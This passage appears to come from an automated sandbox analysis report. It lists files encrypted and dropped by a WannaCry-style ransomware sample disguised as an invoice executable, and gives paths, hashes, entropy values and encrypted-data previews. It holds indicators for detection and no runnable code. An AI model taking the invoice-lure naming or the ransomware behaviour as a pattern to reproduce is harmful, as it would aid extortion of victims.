                                                          Encrypted:false
                                                          SSDEEP:24:bkC1Z0zVCssCIjGvYIoJa0iSBygBOWsdtGdJ56IkBrD3sUhvcRW4b+tG4l3:bkXiCIjGgA0Jy3tGdeB3sUCW46tGo3
                                                          MD5:FD4D939DB76F66B57FE2703E4460B1AB
                                                          SHA1:7D46239EB6A7B485BB195893CD89F3FF1777CAF2
                                                          SHA-256:6F9172B6C6616032FFF0D23DEE7102AF71D5B011C9AC1B46157D41C9A8C09E65
                                                          SHA-512:A7843A64E248ADE089FCD9E68B6376EAD7B93CFF2F66AFF4DFA84BFF10D419CD365958D851D82D019B8D18F2DB43A738A629B486E822E47094A3827FC658425C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......YK...p.G......>"....,.....L*.a\..'..?.K...R.w..........N.O`x].*...E..X8mW.B..... =d......V.=%.....g.......{........2t@)i.J .....-...0...R...SA..it....$.......qT.....v....I/..."F.!$b_..=59sS...@.C.|..o....v.7V...l&.I:....S.v.rb&.FS...Z..A............j\.O...>sp.....nk":.P....F..y^D.M.-..P.c.n....U.......65#.RrE2c`...)....T...,..Z.`.. (RW..&.=oJ..M..d......T..}...p.2....*..........K....l5.qUE../.4hXJ.h.x.%1Uc.......0c.4...V...9.F.....E..nz..%D.....}.prH3D..F.{.e.J.*#;..6..>.|..%}](pD..@....T. ..@K.v....t3.}............l....x.a..A..>.H..d....,......M8....p"AX$.3[..b\.o....1z.g.2.&..X.9.+.Q.#..`kr7....y..f9..<.....E...N.......bd C...+....Q...B.....p..=.........U.%...V..+..I/.S%E.....3+.6.2..<p&z....}.og.]..\......E... .A7 i..O6.l...6.>q...e.?.5.q.....|p...o..-.cL....3&&Ox"-..B..H.....viI..wP....vx..S2.:....G..`....f.M..Va..b....8.6..-f.i../_..h.......5.5.-..g..T\..d-.1U4...w.Z....Bq..g.Y.pO. .v.^ ^.*.vK.>3;.`a.DX..(.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.842046283415181
                                                          Encrypted:false
                                                          SSDEEP:24:bkC1Z0zVCssCIjGvYIoJa0iSBygBOWsdtGdJ56IkBrD3sUhvcRW4b+tG4l3:bkXiCIjGgA0Jy3tGdeB3sUCW46tGo3
                                                          MD5:FD4D939DB76F66B57FE2703E4460B1AB
                                                          SHA1:7D46239EB6A7B485BB195893CD89F3FF1777CAF2
                                                          SHA-256:6F9172B6C6616032FFF0D23DEE7102AF71D5B011C9AC1B46157D41C9A8C09E65
                                                          SHA-512:A7843A64E248ADE089FCD9E68B6376EAD7B93CFF2F66AFF4DFA84BFF10D419CD365958D851D82D019B8D18F2DB43A738A629B486E822E47094A3827FC658425C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......YK...p.G......>"....,.....L*.a\..'..?.K...R.w..........N.O`x].*...E..X8mW.B..... =d......V.=%.....g.......{........2t@)i.J .....-...0...R...SA..it....$.......qT.....v....I/..."F.!$b_..=59sS...@.C.|..o....v.7V...l&.I:....S.v.rb&.FS...Z..A............j\.O...>sp.....nk":.P....F..y^D.M.-..P.c.n....U.......65#.RrE2c`...)....T...,..Z.`.. (RW..&.=oJ..M..d......T..}...p.2....*..........K....l5.qUE../.4hXJ.h.x.%1Uc.......0c.4...V...9.F.....E..nz..%D.....}.prH3D..F.{.e.J.*#;..6..>.|..%}](pD..@....T. ..@K.v....t3.}............l....x.a..A..>.H..d....,......M8....p"AX$.3[..b\.o....1z.g.2.&..X.9.+.Q.#..`kr7....y..f9..<.....E...N.......bd C...+....Q...B.....p..=.........U.%...V..+..I/.S%E.....3+.6.2..<p&z....}.og.]..\......E... .A7 i..O6.l...6.>q...e.?.5.q.....|p...o..-.cL....3&&Ox"-..B..H.....viI..wP....vx..S2.:....G..`....f.M..Va..b....8.6..-f.i../_..h.......5.5.-..g..T\..d-.1U4...w.Z....Bq..g.Y.pO. .v.^ ^.*.vK.>3;.`a.DX..(.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.805978454846127
                                                          Encrypted:false
                                                          SSDEEP:24:a7cO8nBhz6c+Oi8A6NNJWm6ls+ARqn/nlCPavz8nPFL6P8j/Qi:TBh71Ak38IRqvPz2PFuPGJ
                                                          MD5:E7112335E77422948BCC9368881622B6
                                                          SHA1:655BA1F63612E543FD27208F4BD7C638659C24B4
                                                          SHA-256:72FAF407EEA25E5097ACEB8904973F152F89DDE6438BAF7D9FD3E57C0B9E3BDC
                                                          SHA-512:7A937060DEF53F3E397BB0337DC53BE2A201BAA0190D618B84D27EF927BD484444C17A021387013558443C65C90A77B2D6A14274E60E61C60CA5BBA2003272E7
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:...I#..>j.......]....U...t>....+....\7....Y_..... r.s.-.w...P......N....9 (.&...1...u..q=.JSud..M.......IH.$f-......W@. ..K.,B......f.o.ToE>..D....x.....kFp...=f......?`W.JDr......ny.]T...;L./&(.....%g...z*(.......5..."+.....Z=.Q......9.yf9..4.XH.t4.........-e2.|7..CT....e.6W..$.A..{x.>.:.....v.]ix....."k\.E..\..".c..5.sJ.6.......N.~.[RB#.2...V-...~$.....{......@Y..FWl.>.OSA...............CT....-...,.h.>Eo...+....h.Q..b..T.w;...?.oy..N?..3.n0..f.n)..D...^I.. .H..5.|f.t.p.G....%"....S..Er.<.R...f.z.....a..[......'..P...Q....6.8H.....!%8...@.........._"7v...}jb6...X.W....'...0.y...}.(.1..3r.tZ...y...Q-..[{K..=|.wa9<w"..).VU....hKk.z...*..J.........z.]3|...q]..Q....@...Z#...f..o.(.G.x."r......U.......m!..6.Y1tA..#W...w.5.........SG~u.Ra....5<...)..g+".....>H.......~.9..e.wDVqK+=B...z....t....>.?...3/rk....K.k.A..NR.]...J#...c..{e..(..G...v....2.a.d\.fR..1K....Pb49.....A.F....#.....i.;.d]c./......qY.vD'C..`8#..1r.\q...o..*"l2O..a.%h..\?.\..+..%..?

                                                          C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846861919674208
                                                          Encrypted:false
                                                          SSDEEP:24:bkJpUsOHYH31RdWZNpWrT8WALmjMjC4GP8HQBR5EUmv:bkEsO4FRdWZNpWrULmeG/qUe
                                                          MD5:B9D31689BC12BCAFBBA562FF411659E9
                                                          SHA1:AAB5DA4CA5FD996907E36369843A54E4B7EDF8BE
                                                          SHA-256:4370689033F1AF394384F754715529E39285963D03110BE5058062B6965E014A
                                                          SHA-512:F97D91AF93AE9425F386B86F85D37411142C46306681A561098F825684482F8F3E15E05A4F8C4A16652FB1D5A65FBE346CD81F91BDB7817DF41AB2EF3C5B7D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......S.]7).H.........HY(.p._...2.."9o.ia.',.....q.Z.l<...z.j.g..R.e..CB...nw4W.F...]_....v.q....4.&.h.8E....@..r.....h..V.kIW(.,[..b)......onEY.P...3n......v..d.\.i)A.AOa...w.....&.W......a9-.S.L..)...A.9.;...E6d...e.z.."...w..*..f..Z\.................d..."...w.1i.%..7a.ocb........G$.S5*!...W.Rz...B.wm.3..-..|IYEy.}.........d.Z{i....#+..M.(R[J.).y.,....Uq..ET...V...m.@y...'.r..K>. H.V.)=...bd....\....k..^wru.vB.....}..B..&/W..6.PH....g......-..+.{....G....c..4.<.&........@.=./..r.N...T........S.._..B.(..}..(.D..6.f.Gj.Ke..}.5......P...h.`.....&^q..Ei..I.H7...k..5A...?.......C...B"<:..]0....l...-...F......4....}[].a. A'..w*...5.....1..H......n4..R...v.u...l.<.....q.0.....o:amM...7e./.....].x.7rS].T.b.=.3......L ..Ud%..o....).n}|.u1.T...zZ..s&..(..z.....zd.>.C...@q!....Y.*.FA.I..v....0]1#...r..b..0.i.E.At........q../.m..{[."...9...{...pw..e...'.....0.P.|.=.'\....L...c.q}.9.zKb3U...)..bm.c....SB.:..^c.*.A.....

                                                          C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846861919674208
                                                          Encrypted:false
                                                          SSDEEP:24:bkJpUsOHYH31RdWZNpWrT8WALmjMjC4GP8HQBR5EUmv:bkEsO4FRdWZNpWrULmeG/qUe
                                                          MD5:B9D31689BC12BCAFBBA562FF411659E9
                                                          SHA1:AAB5DA4CA5FD996907E36369843A54E4B7EDF8BE
                                                          SHA-256:4370689033F1AF394384F754715529E39285963D03110BE5058062B6965E014A
                                                          SHA-512:F97D91AF93AE9425F386B86F85D37411142C46306681A561098F825684482F8F3E15E05A4F8C4A16652FB1D5A65FBE346CD81F91BDB7817DF41AB2EF3C5B7D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......S.]7).H.........HY(.p._...2.."9o.ia.',.....q.Z.l<...z.j.g..R.e..CB...nw4W.F...]_....v.q....4.&.h.8E....@..r.....h..V.kIW(.,[..b)......onEY.P...3n......v..d.\.i)A.AOa...w.....&.W......a9-.S.L..)...A.9.;...E6d...e.z.."...w..*..f..Z\.................d..."...w.1i.%..7a.ocb........G$.S5*!...W.Rz...B.wm.3..-..|IYEy.}.........d.Z{i....#+..M.(R[J.).y.,....Uq..ET...V...m.@y...'.r..K>. H.V.)=...bd....\....k..^wru.vB.....}..B..&/W..6.PH....g......-..+.{....G....c..4.<.&........@.=./..r.N...T........S.._..B.(..}..(.D..6.f.Gj.Ke..}.5......P...h.`.....&^q..Ei..I.H7...k..5A...?.......C...B"<:..]0....l...-...F......4....}[].a. A'..w*...5.....1..H......n4..R...v.u...l.<.....q.0.....o:amM...7e./.....].x.7rS].T.b.=.3......L ..Ud%..o....).n}|.u1.T...zZ..s&..(..z.....zd.>.C...@q!....Y.*.FA.I..v....0]1#...r..b..0.i.E.At........q../.m..{[."...9...{...pw..e...'.....0.P.|.=.'\....L...c.q}.9.zKb3U...)..bm.c....SB.:..^c.*.A.....

                                                          C:\Users\user\Desktop\HMPPSXQPQV\VWDFPKGDUF.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.821409540539878
                                                          Encrypted:false
                                                          SSDEEP:24:TbyNh4ZVuFHONr1NjnhGBIKRolzqWSNk8QHTiIefsuBaDaq:PyNh4ZY1OP5hcoNBQXVIek/aq
                                                          MD5:C8B64E139DE03A2F68E7CBEF327279C4
                                                          SHA1:BFAD5B95802DB42536666DBA76147C1D612B1411
                                                          SHA-256:4935244D1EECC22D38DB289DCF7178A4E1A742BE06670D04965A1B86A7F3EC15
                                                          SHA-512:5B9E8253FA7C976A03370B332243D150B8B94AEA9A261FAC0482420BFE20E7BFF2E16A2DC66587F9F417FD1681F2E881CEF962A1AAA5DB6C3D2C63DF39AFE631
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:\.8^..X.l....~..Xi.Q.......s_...&l.........xc..DRPj...D.l.//r4.r...i.vs...9Oz.=..:$.....%.........G..j.._P....|..0E3......'..\"/*gZT..H=i.^P..mL!.H.,.[.t......z.zx...f1..U..s..T....4...c\,pd.!...$..(`.......~17AV....z.g..T..jf.B.e.s.+.!...*....,S..8..U...k.f...v...........j.'x..g........3.E.....z+.W..v..3.[.....u........5.^Q...L..|...c.N.....5...|...L..:.J.:..|..t.....N>._..|2X..;.......%]!J.........-..2....EA=..M7..K..d.7.?W.w.qVv.AB...q.G...`..R..|.i:Z..^.].....<.q..\)...f.P..X.f/R...n........ty.T.H... .P....$.M....d..["..i3<.&....53.!.2...&...p..A...1,.xt.y..8z.J...>6..v^....g..|..%.qy)i.t.l.Eu.{...-.6..X......Fyt.[...d;.Uq$.|tp.H.0...7n9,?....u. .|...E.1.V....;.-..v......(W^c..s.'.t.A.....)..&JK.|q.h]V.}....PC..En. ..DvD.....m1.=Fdr...d~@....7.Fh.9..8.K.\...e...O...\........+....Hy.c%.yp].m.......},.f..A.K..,-.}.i.=@#...i....L.....<s...v.../..._&..2..a.....#Ta....W...80.2...W.q.e^...oQ.A.....N..M.b.nSFRXH..if.Ih..K.V.....]:.....!a

                                                          C:\Users\user\Desktop\HMPPSXQPQV\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852375902198529
                                                          Encrypted:false
                                                          SSDEEP:24:bk5NKlFd0vrQkiOvC8LGgtYUaGOa8V3srkXI7hsonZ/+9FlqUDLLbMEhv1hKV:bk5cH+v8k9ygmnG03sp7hsKx+9qUfLbW
                                                          MD5:68C6587A8FA5E6D697D561921B6CEF6F
                                                          SHA1:50F5F76F361F7BB68E9B843207FFB19C329600B6
                                                          SHA-256:9C3BB555124EA40D4A34E0B450CD1959272500E83C2A0A206C7200707560AC63
                                                          SHA-512:C2AE1815E2EC0F3FCCFD0FCC637459B4289CB77C10E02F5D22C6756E7FE1517A88153C520607DCFFAF5BD82537D8E9AE904C13748A133307F5E99A53A3A5AC1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#...\.....0..nQ..Xf.$...vf...#...A...2l0.XR/..Zej.../~.6..>........!..$.m...x.|..A..;.....{..\.....1.. ..k.7....*../.Jz....H....-....G...H..8.....*..{b6].2..O....w$..0....r....j......T.."3^.L.+c.%........D...1.8u.#sz..{.B.\r..J.R....V. .. .1!.s...............B4C...A..m..|.....\7...?.p..\.b.-.......+..5'z...>.O....T.~.v....;\..h...N.k..0.G.L.0.p$.V9P....z2`d}..-....6..>hS...u*...Iq.H=...7.K..../V..k*.g.?".....A...s.....Q.m%......#8W.....!@......Q..Q.Ku..N..{9...@1......\G..;m.1....;..}u./.<.....^e...uz.uc.~.D...N./O..R.....^....Q.....e=Dj.H.....lC.i[4V.q....0'..D.&V..5..UL C*......s.'e.......w..3Y.D.f../.o........../:8...(..5..@n.K.<a.o..-.D...8......R.|._..~hT..r...V..%e~.....z.?c....2......2..X_3.%}P6..Q..".Lj........S.........."..Y,hYZ.F..hV.e.....9..L|';..`......RU."...k..@..p...k..Nf..ec...j...p........t..-..]..............H.n+...T..V{=h.'.c..s.gb.[..{..B.0.z...\...K......$k1j.........C....,P.s....`.UQ..K*....}..].

                                                          C:\Users\user\Desktop\HMPPSXQPQV\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852375902198529
                                                          Encrypted:false
                                                          SSDEEP:24:bk5NKlFd0vrQkiOvC8LGgtYUaGOa8V3srkXI7hsonZ/+9FlqUDLLbMEhv1hKV:bk5cH+v8k9ygmnG03sp7hsKx+9qUfLbW
                                                          MD5:68C6587A8FA5E6D697D561921B6CEF6F
                                                          SHA1:50F5F76F361F7BB68E9B843207FFB19C329600B6
                                                          SHA-256:9C3BB555124EA40D4A34E0B450CD1959272500E83C2A0A206C7200707560AC63
                                                          SHA-512:C2AE1815E2EC0F3FCCFD0FCC637459B4289CB77C10E02F5D22C6756E7FE1517A88153C520607DCFFAF5BD82537D8E9AE904C13748A133307F5E99A53A3A5AC1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#...\.....0..nQ..Xf.$...vf...#...A...2l0.XR/..Zej.../~.6..>........!..$.m...x.|..A..;.....{..\.....1.. ..k.7....*../.Jz....H....-....G...H..8.....*..{b6].2..O....w$..0....r....j......T.."3^.L.+c.%........D...1.8u.#sz..{.B.\r..J.R....V. .. .1!.s...............B4C...A..m..|.....\7...?.p..\.b.-.......+..5'z...>.O....T.~.v....;\..h...N.k..0.G.L.0.p$.V9P....z2`d}..-....6..>hS...u*...Iq.H=...7.K..../V..k*.g.?".....A...s.....Q.m%......#8W.....!@......Q..Q.Ku..N..{9...@1......\G..;m.1....;..}u./.<.....^e...uz.uc.~.D...N./O..R.....^....Q.....e=Dj.H.....lC.i[4V.q....0'..D.&V..5..UL C*......s.'e.......w..3Y.D.f../.o........../:8...(..5..@n.K.<a.o..-.D...8......R.|._..~hT..r...V..%e~.....z.?c....2......2..X_3.%}P6..Q..".Lj........S.........."..Y,hYZ.F..hV.e.....9..L|';..`......RU."...k..@..p...k..Nf..ec...j...p........t..-..]..............H.n+...T..V{=h.'.c..s.gb.[..{..B.0.z...\...K......$k1j.........C....,P.s....`.UQ..K*....}..].

                                                          C:\Users\user\Desktop\HQJBRDYKDE.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.776661021195404
                                                          Encrypted:false
                                                          SSDEEP:12:c72fWcMToiC0xbi3dOGm6UD+LEUg0Ctjz0GDj1PVe4ZzuwQOFOkNNTgkKW19vf3u:c7cWvNbmd4zV0MNjpY4zRfKqxUbr
                                                          MD5:DA7C2B06B8685341CB3AD4320603CABC
                                                          SHA1:ABFDCF496DC7304D68B005080555AF234CB04EAA
                                                          SHA-256:3A997457FADB69887B8AE9C8F4D21CDD8CBD61EB4CB6D6F6C5E862CEEE195EE4
                                                          SHA-512:7498FC9D1B7B34C54E78E59B0B78172183E769B03E40587676D34CBC29A6C322CB0F3D830393B1C5022D6004798D7B9DED0DEEA9CDD0E349AFC04B46E7509B07
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:}.!...........b....'......=.y:K.<...u)..\d..z.....G..2.....8.......r.."..CCQ...v\....D./8.E...1..T...X}vz.`.%...*V.Xg,w.,...3Z..F...F...\[$b.(HO..8........})....w!G..G.....6.M.F.......z..>c.cx.y......H......v.........#._..o.Z.jA.z..T...^......X..7._..'..&...-.L.".:.....{.....Z.z.3C.3.>.K..H#8C.nZ.......*...G.&.HG?0.E.v\.. N..".?^..a.p...y(-..m:.VK...3x.$...f.:...-../..j.SJ".x..3..Sw.*..?xH^X.d...kU..,..^..Q>.M.#.#.].Nn..6zq....J.".t.pM..6... ..^../.5..=1....oa ./...b..WO..._v.o.\.....=p.q`..z..l.).|...........S..z2......]W....3yw....k."E...tJu#..B.{...{...F.....+.G....I.B.u....#.w.x.D.`..a.S.xu.LA...+.F>./..Wb..u..%}..'-.i.V.{..a..]<_....j..+'.g.2......q.jv...+u.L.y....j#..w .{i.F...].U..'..Oo..H.u.......v..bn..s..&.......O.."..v....3.0D,f..X.2....m...5kXG.,j..A.0..(...m*!......P..$....is..3.F=!.i.....r\..HL6.....pQ?-.{......R.m..G.../.R.....xu........z.rk9.=..=...v....G..:...Q..lp....~....T...`.G.f.a.......a.#..Aiq........F.xQ.!.

                                                          C:\Users\user\Desktop\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829376610701004
                                                          Encrypted:false
                                                          SSDEEP:24:bkHp0Gg1N0UCgtRN2FaZycyf4sjak2+qq6bpt6FoRsQBAUmhMS17O:bkMeotWFyiaqi6FHUhdS1K
                                                          MD5:8F38CF9E85492DBFC44DE06ABF5202AA
                                                          SHA1:FC54FBE6778BE07B41BDBC4D51A18CA2FCA61123
                                                          SHA-256:4949E0378F261B8CDE67386841342A5A7F42DC76BD38594B64FFEC67A1C3762B
                                                          SHA-512:1585EE9D7B55599CDCB2E3B11ADA61C74F96EEBB5D7A234AFC463E0672611037B77C897FCC46CE6B916F3BB9C8EB6DCF7D232DAE6DB91890E539E1E376257950
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<.o?............=.E;.l.5N.J@,.&......[.>...)...".r..soc..d.I8..H...,..A.......O.;.D.k...n.#..F...K.CC..Ml....q0..'6.f.!...6.. a......1.......~..--9L?...dWplx.4.......8K.@O>.....<..'..w|...6\...e&+.....sy.K..Y.^.i..Prm*V<e.&.......Hn;=L.3..H..Q............>.P.K.0.C.........& .fLz$......?........]|.).KTaZj.D.......#d"4............J|.;.......Lh....G......G..8IW.b.)e.p.C.._../odG...!.?..l....M.|MW..Qy..W...3%...cF.-.3v.~]U.\~:.@U.xT5.n...^9.;..&...y.^.t...Y...V..K....3.a.N@#.4....$.....k.0..i.X..l..a.K...5-.7.O..Q+.H./}..p..'."<&/U.Lb0].[iV.j.:...E_....e....>...Kep;T...n.'.. ;&C..B.j.sN.......&c+iZ.......;.@|...L..xR"....O2.H:.g[.b.-....2...Xa..iX.@vD..../...H.._..h..p.S.t.cn...N-Z.s3o."....d....:j...S>...{......Q...?...._.l0..-..d.F.>O2;9...x}...4....nF...L..XJB.....p....R..#h*}y..V..=.S.xl..p..8...$P.C....l\.....P....ya..{B.#^C...%...t.`..gDb.A..x!......x.`.Hp3.g....n._..P&u.o...Jp...I.1..P..d..n.yq.......?..D.h..HJP.....>. .|c:..

                                                          C:\Users\user\Desktop\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829376610701004
                                                          Encrypted:false
                                                          SSDEEP:24:bkHp0Gg1N0UCgtRN2FaZycyf4sjak2+qq6bpt6FoRsQBAUmhMS17O:bkMeotWFyiaqi6FHUhdS1K
                                                          MD5:8F38CF9E85492DBFC44DE06ABF5202AA
                                                          SHA1:FC54FBE6778BE07B41BDBC4D51A18CA2FCA61123
                                                          SHA-256:4949E0378F261B8CDE67386841342A5A7F42DC76BD38594B64FFEC67A1C3762B
                                                          SHA-512:1585EE9D7B55599CDCB2E3B11ADA61C74F96EEBB5D7A234AFC463E0672611037B77C897FCC46CE6B916F3BB9C8EB6DCF7D232DAE6DB91890E539E1E376257950
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<.o?............=.E;.l.5N.J@,.&......[.>...)...".r..soc..d.I8..H...,..A.......O.;.D.k...n.#..F...K.CC..Ml....q0..'6.f.!...6.. a......1.......~..--9L?...dWplx.4.......8K.@O>.....<..'..w|...6\...e&+.....sy.K..Y.^.i..Prm*V<e.&.......Hn;=L.3..H..Q............>.P.K.0.C.........& .fLz$......?........]|.).KTaZj.D.......#d"4............J|.;.......Lh....G......G..8IW.b.)e.p.C.._../odG...!.?..l....M.|MW..Qy..W...3%...cF.-.3v.~]U.\~:.@U.xT5.n...^9.;..&...y.^.t...Y...V..K....3.a.N@#.4....$.....k.0..i.X..l..a.K...5-.7.O..Q+.H./}..p..'."<&/U.Lb0].[iV.j.:...E_....e....>...Kep;T...n.'.. ;&C..B.j.sN.......&c+iZ.......;.@|...L..xR"....O2.H:.g[.b.-....2...Xa..iX.@vD..../...H.._..h..p.S.t.cn...N-Z.s3o."....d....:j...S>...{......Q...?...._.l0..-..d.F.>O2;9...x}...4....nF...L..XJB.....p....R..#h*}y..V..=.S.xl..p..8...$P.C....l\.....P....ya..{B.#^C...%...t.`..gDb.A..x!......x.`.Hp3.g....n._..P&u.o...Jp...I.1..P..d..n.yq.......?..D.h..HJP.....>. .|c:..

                                                          C:\Users\user\Desktop\LHEPQPGEWF.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.804696797628274
                                                          Encrypted:false
                                                          SSDEEP:24:a0YYmCyOPbpclRtwpONVYmc9HMJfzqytSuMKOQB6CRl/yDXKTUGdk:OYV3PbClRtCiVcBMRzqykuMKOUR5yqUJ
                                                          MD5:DE6900311FB992C4DEE5502D3AAB75D1
                                                          SHA1:281EA8D8703692EF9683DD4635C2EB3062BBD2B7
                                                          SHA-256:D4F11203FC611B85A2118329F82E27C290A9B6348AC32D42845F195EA339BF42
                                                          SHA-512:3C661B75F6659124B8C5E6E9EFDFB1DA8DABD89B5D5E43C27CC7B9B47C1194AAC57790A7A17A77012548D0F701C8DD7696AE94D7D00FF30B5DB7090BE403D05F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...z.b8Hz.Q.s}...Rm...yR..G....8..3.A[.....:@.}@!..r..`.Wh&<i.h?.P.Lj..q...P..y`...Z..$`.cl...m%@...'..t40.0G.@.......s..S#..`.K....G..NM.J...f..uO.....h....W.l..3..h.s.M.".v].n.'Z....@..&..BM.F..i.(...{4,........f..6}..;w<W..Q...s..[..F..b.......`..#./.-W.........B..;G.;.......I.?1...ZU......C.[...=?(.+ks.7K..9..q!$r..vp|1.f....,..y..[.g.m....._..B....G3N CB....d..S.wb.`d.4!U*jP.,..3.....gA.....+...d....9.M..h9..n..l.^.c>.G.\]..c.M....}.))W..'"-.|]>q...Gp.THS.....$c.i!..|.|._.X|....a......f.l.}..uA.J.@.|....*...}vZ.o..HA..#g1..Z...zM..{...-.........o....U..r.}....7....JN.......]...qw).....`.Y|....).7.a.......+.t..@|.....5k..~...6B..[.z.1.`.P>....s...|.4......DsbX..J..j7.....1m%..I...=.np...d.-..7..!...2.Qy..t.9.(-.....g.'3....P..h...Ld.H;S.pd..Q*.zic\^v...i......DE...)*.G.Oo....@..<.7_o.....g.$".f..l...c.....u.".@g.........[k.yu...{A..".... ~-.e.3t;..j.I..7.Q.......e.k....6..Y...^.b.......bd..ny..{.....4.=.;q.mg.U.3.Y.....

                                                          C:\Users\user\Desktop\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840539320181757
                                                          Encrypted:false
                                                          SSDEEP:24:bkmZmsAqs5ryMgGa/k24/yUEOiDdJuWxRb4RRJeRnsieVuFTYV4lGw2bPnki+LQ:bk6msA3ryrcz/kPuv/Ssimuc4lGqtLQ
                                                          MD5:CAB1F292EDCC1474986D8DA5DBAE4FA1
                                                          SHA1:1E9D7DEF5EE19359BD6E9E75ACA470230055C571
                                                          SHA-256:B2864012B91D4A81C1C72A1B391195A4DCCF034B7403EB752B1AE4460318AD8D
                                                          SHA-512:46980A02D2CD5591CC2F3B7F1E63D5FA225C44F9DA88B4C0F5D434339F35AA185F3785BFAB3D5A640A011EA5EBDFD039D85B000BFEBD53773189C4ECB5501016
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&&.b.......4}...,}...R.W...P...Y.P=O..`.N.]..........f.yF.uOr.... ..^ ....QX...aKOD^/..=t..4....dM:..0.?.M.{....{.#?.D..4o..a..}....c....}..C.@....p.z..%...$,...cJU..BJU2...y.>n|;KA.}.....L.A1*.7..T..)........H...LbV...`......T.8..w.W;RGE.,............w.+..[o.(..7*i....n..nK........^......J....-...N.^"..._.X:}....j).=.F"N.x4\.."../p qP.i.k...z.q..y...iO..~?..aA....Z.t...U.mc.K.......5...k..$....]C..s......5.K...<.n-C...g.5..j.........7FI..D.C&...5..EL6.....C......oK..I.R...1F.....;...&U.-...D..>,..X...0|...O........lG..)...&eI.k(....B.j...1..!....m..rgc...B..X...... ...n\G.tv...YO.pucF..J...Y......G......v.B..u.nB..?.......D..'../.N......z.|.Q..F.......;O..y.J.Kw...r<?0*.q...V..Q...:`..P..)...O.!....j.%$:x..@)......l9K.C.^gF.8).YC.-..^(C.KcE.;.@....Wn....+......).......n-.:.w........x.&.M.E.`....X~q.6_...z.^..4.)\....+i[y.vA.....eF..)L.9.....p<}]=Zu..J.)......8b...vw..~;.P...4K........+...a.Q..!'h..W...g=5>C....7...U.:g.

                                                          C:\Users\user\Desktop\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840539320181757
                                                          Encrypted:false
                                                          SSDEEP:24:bkmZmsAqs5ryMgGa/k24/yUEOiDdJuWxRb4RRJeRnsieVuFTYV4lGw2bPnki+LQ:bk6msA3ryrcz/kPuv/Ssimuc4lGqtLQ
                                                          MD5:CAB1F292EDCC1474986D8DA5DBAE4FA1
                                                          SHA1:1E9D7DEF5EE19359BD6E9E75ACA470230055C571
                                                          SHA-256:B2864012B91D4A81C1C72A1B391195A4DCCF034B7403EB752B1AE4460318AD8D
